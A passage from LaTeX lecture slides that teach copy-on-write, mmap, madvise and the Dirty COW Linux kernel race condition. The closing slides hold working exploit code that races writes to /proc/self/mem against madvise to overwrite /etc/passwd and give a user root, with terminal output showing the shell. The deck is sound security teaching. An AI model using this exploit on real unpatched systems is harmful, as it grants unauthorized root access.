\onslide<3->{\draw[_arc, line width=1pt] (0,1.25) -- (0,1.55) -- (1.5,1.55);}

\onslide<5->{\draw[_arc, line width=1pt] (9,0.75) -- (6.5,0.75) -- (6.5,1.75) -- (4,1.75);}
%\node at (6.5,2) {Before copy};

%\draw[_arc, line width=1pt,red!60] (9,0.75) -- (6.5,0.75) -- (6.5,-0.25) -- (4,-0.25);
%\node[red!60] at (6.5,-0.5) {After copy};
%\draw[_arc, line width=4pt,red!60] (4,2) to[out=-30,in=30] node[midway, right,red!60] {\textsc{Copy}} (4,0);
\end{tikzpicture}}
\end{center}
\end{frame}

\begin{frame}
\frametitle{The \texttt{MAP\_PRIVATE} option}
\begin{itemize}[<+->]
\item Consider several processes map the same file using \texttt{MAP\_PRIVATE}
\item They map the file to different \emph{virtual} memory addresses
\item The physical memory, where the file content is held, is \emph{the same}
\item With this option, for as long as processes \emph{read}, the situation remains the same
\item If a process requests a writing operation, a private copy is created for this process only
	\begin{itemize}
	\item Making the copy is delayed until needed since it takes time to copy memory
	\end{itemize}
\item Writing to the mapped memory (from the virtual addresses)
	\begin{itemize}
	\item updates the private copy \emph{only}
	\item \emph{does not} update the shared physical memory
	\item \emph{does not} update the file
	\end{itemize}
\item Any modification is \emph{not} visible to other processes
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Illustration: \texttt{MAP\_PRIVATE} when writing}
\begin{center}
\scalebox{.65}{
\begin{tikzpicture}
%proc 1
\onslide<1->{\node[text width=2.5cm, align=flush center] at (-4.75,4.5) {Process 1's virtual memory};}
\onslide<4->{\filldraw[lightgray] (-6,3.5) rectangle (-3.5,2);}
%\visible<6->{\filldraw[blue!60] (-5.75,2.55) rectangle (-3.75,2.25);}
%\visible<6->{\node at (-4.75,2.4) {\footnotesize \texttt{memcpy}};}
\onslide<1->{\draw (-6,-1.5) -- (-6,4);}
\onslide<1->{\draw (-3.5,-1.5) -- (-3.5,4);}

%phys mem
\onslide<1->{\node at (2.75,4.5) {Physical memory};}

\onslide<4->{\filldraw[lightgray] (1.5,2.5) rectangle (4,1);}
%\visible<6->{\filldraw[blue!60] (1.75,1.55) rectangle (3.75,1.25);}
%\visible<6->{\node at (2.75,1.4) {\footnotesize \texttt{memcpy}};}

\onslide<6->{\filldraw[lightgray] (1.5,0.5) rectangle (4,-1);}
\visible<8->{\filldraw[blue!60] (1.75,-0.45) rectangle (3.75,-0.75);}
\visible<8->{\node at (2.75,-0.6) {\footnotesize \texttt{memcpy}};}

\onslide<1->{\draw (1.5,-1.5) -- (1.5,4);}
\onslide<1->{\draw (4,-1.5) -- (4,4);}

%file
\onslide<2->{\draw (-0.5,-1) -- (-0.5,1) -- (0.25, 1) -- (0.5,0.75) -- (0.5,-1) -- (-0.5,-1);}
\onslide<2->{\foreach \i in {1, ..., 8}
	\draw (-0.4,\i*0.2-1) -- (0.4, \i*0.2-1);}
\onslide<2->{\draw (-0.4,0.8) -- (0.3, 0.8);}
\onslide<2->{\node at (0,-1.25) {File};}

%proc 2
\onslide<1->{\node[text width=2.5cm, align=flush center] at (10.25,4.5) {Process 2's virtual memory};}
\onslide<5->{\filldraw[lightgray] (9,1.5) rectangle (11.5,0);}
\visible<8->{\filldraw[blue!60] (9.25,0.55) rectangle (11.25,0.25);}
\visible<8->{\node at (10.25,0.4) {\footnotesize \texttt{memcpy}};}
\onslide<1->{\draw (9,-1.5) -- (9,4);}
\onslide<1->{\draw (11.5,-1.5) -- (11.5,4);}

%arrows
\onslide<4->{\draw[_arc, line width=1pt] (-3.5,2.75) -- (-1,2.75) -- (-1,1.95) -- (1.5,1.95);}
\onslide<3->{\draw[_arc, line width=1pt] (0,1.25) -- (0,1.55) -- (1.5,1.55);}

\onslide<5-6>{\draw[_arc, line width=1pt] (9,0.80) -- (6.5,0.80) -- (6.5,1.75) -- (4,1.75);}
%\node at (6.5,2) {Before copy};

\onslide<7->{\draw[_arc, line width=1pt,red!60] (9,0.75) -- (6.5,0.75) -- (6.5,-0.25) -- (4,-0.25);}
%\node[red!60] at (6.5,-0.5) {After copy};
\visible<6->{\draw[_arc, line width=4pt,red!60] (4,2) to[out=-30,in=30] node[midway, right,red!60] {\textsc{Copy}} (4,0);}
\end{tikzpicture}}
\end{center}
\end{frame}

\begin{frame}
\frametitle{Copy on write}
\begin{exampleblock}<+->{Observation}
	\begin{itemize}[<+->]
	\item If a processes doesn't need to write to the memory, a private copy is not needed
	\item If writing is needed, a private copy becomes necessary 
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item A virtual memory mapped using \texttt{MAP\_PRIVATE} still points to the shared physical memory \emph{initially} (the "master" copy)
\item When a copy is needed, the kernel
	\begin{enumerate}
	\item allocates a new block of physical memory 
	\item copies the content of the master copy to  the new physical memory
	\item updates the page table of the process, so the mapped virtual memory now points to the new physical memory
	\end{enumerate}
\item This behaviour is called \emph{Copy on Write}, and is used extensively in OSes
	\begin{itemize}
	\item Not only by \texttt{mmap}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Another example}
\begin{itemize}[<+->]
\item A parent process creates a child process using the \texttt{fork} system call
\item A child is supposed to have its own private memory
	\begin{itemize}
	\item The initial content is copied from the parent
	\end{itemize}
\item Copying is time consuming, so OSes delay it until necessary
	\begin{itemize}
	\item There is no need for a copy if both only read
	\item The OS lets the child share the parent's memory by making their page entries point to the same physical memory
	\item Page entries for \emph{both} processes are set as read-only
	\end{itemize}
\item If \emph{any one} tries to write to the memory, an exception is raised and the kernel allocates a new memory for the \emph{child} process
	\begin{itemize}
	\item Only for the affected page, called a \emph{dirty} page
	\end{itemize}
\item The kernel then copes the content from the parent, and updates the child's page table
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Discarding the copied memory}
\begin{itemize}[<+->]
\item After a program gets its private copy of the mapped memory, it can use the \texttt{madvise} system call
	\begin{itemize}
	\item Used to give advises on how the memory will be used
	\item Several types of advises are supported to optimise memory management
	\end{itemize}
\item {\small \lstinline|int madvise(void* addr, size_t length, int advise);|}
\item The \texttt{MADV\_DONTNEED} tells the kernel that we don't need the claimed part of the address anymore
	\begin{itemize}
	\item The kernel will free the resource of the claimed address
	\end{itemize}
\item We used this in the Dirty COW attack
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Behaviour of discarded memory}
\begin{exampleblock}<+->{2020 Linux Programmer's manual}
	\begin{itemize}[<+->]
	\item Subsequent accesses of pages in the range will succeed, but will result in repopulating the memory contents from the up-to-date contents of the mapped file
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Example
	\begin{enumerate}
	\item We use \texttt{mmap} with \texttt{MAP\_PRIVATE}
	\item The page table points to some physical memory
	\item We use \texttt{write}, a copy is made (COW)
	\item The page table points to the copy
	\item We use \texttt{madvise} with \texttt{MADV\_DONTNEED}
	\item The page table points back to the original physical memory
	\end{enumerate}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Read-only files}
\begin{itemize}[<+->]
\item Dirty COW involves mapping read-only root-owned files
	\begin{enumerate}
	\item We \texttt{open} it with the \texttt{O\_RDONLY} and then \texttt{mmap} with \texttt{PROT\_READ}
		\begin{itemize}
		\item Otherwise, the calls fail and we get a segmentation fault
		\end{itemize}
	\item We map using \texttt{MAP\_PRIVATE}
		\begin{itemize}
		\item We can use \texttt{memcpy} to read, but not to write
		\end{itemize}
	\item However, the OS \emph{can} write
		\begin{itemize}
		\item It's ok, because we actually write to a copy
		\item We'll sneak in with through the \texttt{proc} filesystem
		\end{itemize}
	\item We use \texttt{madvise} with \texttt{MADV\_DONTNEED}
		\begin{itemize}
		\item Updates are not carried through
		\end{itemize}
	\end{enumerate}
\item The behaviour looks safe
	\begin{itemize}
	\item We can't write to a root-owned read-only file
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Code example}
\begin{itemize}
\item File \texttt{map-ro.c}
\end{itemize}
\begin{lstlisting}
int main()
{
    struct stat st;
    int fd = open("/zzz", O_RDONLY);
    fstat(fd, &st);
    void * map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    
    int mfd = open("/proc/self/mem", O_RDWR); //open the process's memory
    lseek(mfd, (off_t) map + 5, SEEK_SET); //move to byte 5
    
    const char* stuff = "stuff";
    write(mfd, stuff, strlen(stuff)); //writes to memory (triggers COW)
    
    //checks whether the write is successful
    char buffer[30];
    memcpy(buffer, map, 2 * 5 + strlen(stuff));
    printf("After write  : %s\n", buffer);
    
    //checks the content after madvise
    madvise(map, st.st_size, MADV_DONTNEED);
    memcpy(buffer, map, 2 * 5 + strlen(stuff));
    printf("After madvise: %s\n", buffer);
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Experiment}
\begin{itemize}
\item We use a root-owned file
\end{itemize}
\begin{lstlisting}[style=bash]
$ ls -ld /zzz && cat /zzz
-rw-r--r-- 1 root root 39 aoû 30 07:48 /zzz
11111111111111111111111111111111111111
\end{lstlisting}
\begin{itemize}
\item Code output
\end{itemize}
\begin{lstlisting}[style=bash]
$ ./map-ro 
After write  : 11111stuff11111
After madvise: 111111111111111
\end{lstlisting}
\begin{itemize}
\item After running the code
\end{itemize}
\begin{lstlisting}[style=bash]
$ cat /zzz
11111111111111111111111111111111111111
\end{lstlisting}
\begin{itemize}
\item Updates are not being carried through
\end{itemize}
\end{frame}

\subsection{Vulnerability}

\begin{frame}
\frametitle{Recipe for a disaster}
\begin{itemize}[<+->]
\item \texttt{write} can be used to write to some mapped memory
\item For memory of the COW type, system calls perform three steps
	\begin{enumerate}[<+->]
	\item Make a copy of the mapped memory
	\item Update the page table
	\item Write to the memory
	\end{enumerate}
\end{itemize}
\begin{alertblock}<+->{Problem}
	\begin{itemize}[<+->]
	\item These steps are not atomic
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item Creates a vulnerability to race condition attacks
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{The race condition}
\begin{itemize}[<+->]
\item When the \texttt{write} system call starts, it checks the protection of mapped memory
	\begin{itemize}
	\item It is marked as COW, so it triggers the three non-atomic steps (copy, update table, write)
	\end{itemize}
\item We'll try to use \texttt{madvise} with \texttt{MADV\_DONTNEED} between the update of the page table and the actual write operation
	\begin{itemize}
	\item \texttt{madvise} will make the page table point back to the original memory
	\item Negates the update
	\end{itemize}
\item Since we're supposedly writing inside a copy, no further checks are needed
\item Carries updates to the underlying file, a read-only file
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{The plan}
\begin{center}
\scalebox{.55}{
\begin{tikzpicture}
%write
\onslide<2->{\node at (-6,5.5) {The \texttt{write} system call on COW memory};}

\onslide<3->{\node[draw, minimum width=4cm, text width=4cm, align=flush center] (step1) at (-6,4.5) {\textsc{Step 1} : Make a copy of the mapped memory};}

\onslide<4->{\node[draw, minimum width=4cm, text width=4cm, align=flush center] (step2) at (-6,2.5) {\textsc{Step 2} : Update the page table};}

\onslide<6->{\node at (-3.5,1.5) {\footnotesize \texttt{madvise} with \texttt{MADV\_DONTNEED}};}
\onslide<6->{\node[draw, minimum width=4cm, text width=4cm, align=flush center,red!60] (madvise) at (-3.5,0.5) {\color{black}Change the page table to point back to the original memory};}

\onslide<7->{\node[draw, minimum width=4cm, text width=4cm, align=flush center] (step3) at (-6,-1.5) {\textsc{Step 3} : Write to the memory};}

\onslide<1->{\draw[dashed] (-1,5) -- (-1,-2);}

%phys mem
\onslide<1->{\node at (2.75,4.5) {Physical memory};}

\onslide<1->{\filldraw[lightgray] (1.5,2.5) rectangle (4,1);}
\visible<7->{\filldraw[blue!60] (1.75,1.55) rectangle (3.75,1.25);}
\visible<7->{\node at (2.75,1.4) {\footnotesize Overwritten};}

\onslide<3->{\filldraw[lightgray] (1.5,0.5) rectangle (4,-1);}

\onslide<1->{\draw (1.5,-1.5) -- (1.5,4);}
\onslide<1->{\draw (4,-1.5) -- (4,4);}

%file
\onslide<1->{\draw (-0.5,-1) -- (-0.5,1) -- (0.25, 1) -- (0.5,0.75) -- (0.5,-1) -- (-0.5,-1);}
\onslide<1->{\foreach \i in {1, ..., 8}
	\draw (-0.4,\i*0.2-1) -- (0.4, \i*0.2-1);}
\onslide<1->{\draw (-0.4,0.8) -- (0.3, 0.8);}
\visible<7->{\filldraw[blue!60] (-0.4,-0.3) rectangle (0.4,-0.5);}
\visible<1->{\node at (0,-1.25) {File};}

%proc 2
\onslide<1->{\node[text width=2.5cm, align=flush center] at (10.25,4.5) {Process 2's virtual memory};}
\onslide<1->{\filldraw[lightgray] (9,1.5) rectangle (11.5,0);}
\visible<7->{\filldraw[blue!60] (9.25,0.55) rectangle (11.25,0.25);}
\visible<7->{\node at (10.25,0.4) {\footnotesize Overwritten};}
\onslide<1->{\draw (9,-1.5) -- (9,4);}
\onslide<1->{\draw (11.5,-1.5) -- (11.5,4);}

%arrows
\onslide<1->{\draw[_arc, line width=1pt] (0,1.25) -- (0,1.55) -- (1.5,1.55);}

\onslide<1-3>{\draw[_arc, line width=1pt] (9,0.8) -- (6.5,0.8) -- (6.5,1.75) -- (4,1.75);}
\visible<6->{\draw[_arc, line width=1pt,red!60] (9,0.8) -- (6.5,0.8) -- (6.5,1.75) -- (4,1.75);}

\onslide<4,5>{\draw[_arc, line width=1pt,Green] (9,0.75) -- (6.5,0.75) -- (6.5,-0.25) -- (4,-0.25);}
\onslide<3->{\draw[_arc, line width=4pt,Green] (4,2) to[out=-30,in=30] node[midway, right,Green] {\textsc{Copy}} (4,0);}

\onslide<4->{\draw[_arc, line width=2pt] (step1.south)++(-1cm,0) -- ++(0,-0.85cm);}
\onslide<5->{\draw[_arc, line width=2pt] (step2.south)++(-1cm,0) -- ++(0,-2.85cm);}
\onslide<6->{\draw[_arc, line width=2pt,red!60] (madvise.west) -- ++(-1.2cm,0);}
\end{tikzpicture}}
\end{center}
\end{frame}

\subsection{Deployment}

\begin{frame}
\frametitle{Setup}
\begin{itemize}[<+->]
\item We need to launch two threads in the attack program
	\begin{enumerate}
	\item One trying to \texttt{write} to the mapped memory
	\item One trying to discard the private copy with \texttt{madvise}
	\end{enumerate}
\item Succeeds if \texttt{madvise} happens between the update of the page table and the actual write operation
	\begin{itemize}
	\item Fails in the two other cases
	\end{itemize}
\item We choose \texttt{etc/passwd} as our target file
	\begin{itemize}
	\item World-readable, but non-root users cannot modify it
	\end{itemize}
\item We will target the third field, specifying the uid of user
	\begin{itemize}
	\item Primary basis for access control
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Objective}
	\begin{itemize}[<+->]
	\item Have the Dirty COW vulnerability change this field to \texttt{0}
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Users and \texttt{/etc/passwd}}
\begin{itemize}
\item We create another account for this experiment
	\begin{itemize}
	\item Because it will become root, and we don't want to mess with other experiments using a regular user account
	\end{itemize}
\end{itemize}
\begin{lstlisting}[style=bash]
$ cat /etc/passwd | grep -e root -e serra
root:x:0:0:root:/root:/bin/bash
serra:x:1000:1000:Romain Absil,,,:/home/serra:/bin/bash
nm-openvpn:x:128:141:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
$ sudo adduser cow
...
Ajout du nouveau groupe "cow" (1001) ...
Ajout du nouvel utilisateur "cow" (1001) avec le groupe "cow" ...
Création du répertoire personnel "/home/cow"...
...
$ cat /etc/passwd | grep -e root -e serra -e cow
root:x:0:0:root:/root:/bin/bash
serra:x:1000:1000:Romain Absil,,,:/home/serra:/bin/bash
nm-openvpn:x:128:141:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
cow:x:1001:1001:,,,:/home/cow:/bin/bash
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{The main thread}
\begin{itemize}[<+->]
\item We map \texttt{/etc/passwd} into memory
	\begin{itemize}
	\item We can only map it to read-only memory
	\end{itemize}
\item The ultimate goal is to write to \emph{this} mapped memory
	\begin{itemize}
	\item Not the copy
	\end{itemize}
\item We are trying to exploit the Dirty COW race condition
\item We create two additional threads and run them in parallel
	\begin{enumerate}
	\item the "write" thread, trying to replace \texttt{cow:x:1001} with \texttt{cow:x:0000}
		\begin{itemize}
		\item Since the memory is COW, we actually write to a copy of the mapped memory
		\end{itemize}
	\item the "madvise" thread, trying to discard the mapped memory in a loop
	\end{enumerate}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{itemize}
\item File \texttt{cow-attack.cpp}
\end{itemize}
\begin{lstlisting}
int main()
{
    int fd = open("/etc/passwd", O_RDONLY);
    struct stat st;
    fstat(fd, &st);
    auto size = st.st_size;
    
    void* map = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0);
    
    char* pos = std::strstr(static_cast<char*>(map), "cow:x:1001");
        
    std::thread th1(madvice_thread, size, map);
    std::thread th2(write_thread, pos);
    
    th1.join();
    th2.join();
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{The two thread routines}
\begin{itemize}
\item File \texttt{cow-attack.cpp}
\end{itemize}
\begin{lstlisting}
void madvice_thread(int size, void* map)
{
    while(true)   
        madvise(map, size, MADV_DONTNEED);
}

void write_thread(char* pos)
{
    static const char * content = "cow:x:0000";
    
    int fd = open("/proc/self/mem", O_RDWR);
    while(true)
    {
        lseek(fd, (off_t)pos, SEEK_SET); //move to pos
        write(fd, content, strlen(content));
    }
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Launching the attack}
\begin{itemize}
\item Environment: Ubuntu 12.04
	\begin{itemize}
	\item Any pre- Feb. 2017 Linux system is vulnerable	
	\end{itemize}
\end{itemize}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ su cow
Password:
cow@ssd-vb:/home/cow$ id
uid=1001(cow) gid=1001(cow) groups=1001(cow)
cow@ssd-vb:/home/cow$ exit
exit
ssd@ssd-vb:~$ gcc -o cow-attack cow-attack.c -lpthread
ssd@ssd-vb:~$ ./cow-attack
 ....
^C
ssd@ssd-vb:~$ cat /etc/passwd | grep cow
cow:x:0000:1001:,,,:/home/cow:/bin/bash
ssd@ssd-vb:~$ su cow
Password:
root@ssd-vb:# id
uid=0(root) gid=1001(cow) groups=1001(cow)
\end{lstlisting}
\end{frame}

\end{document}
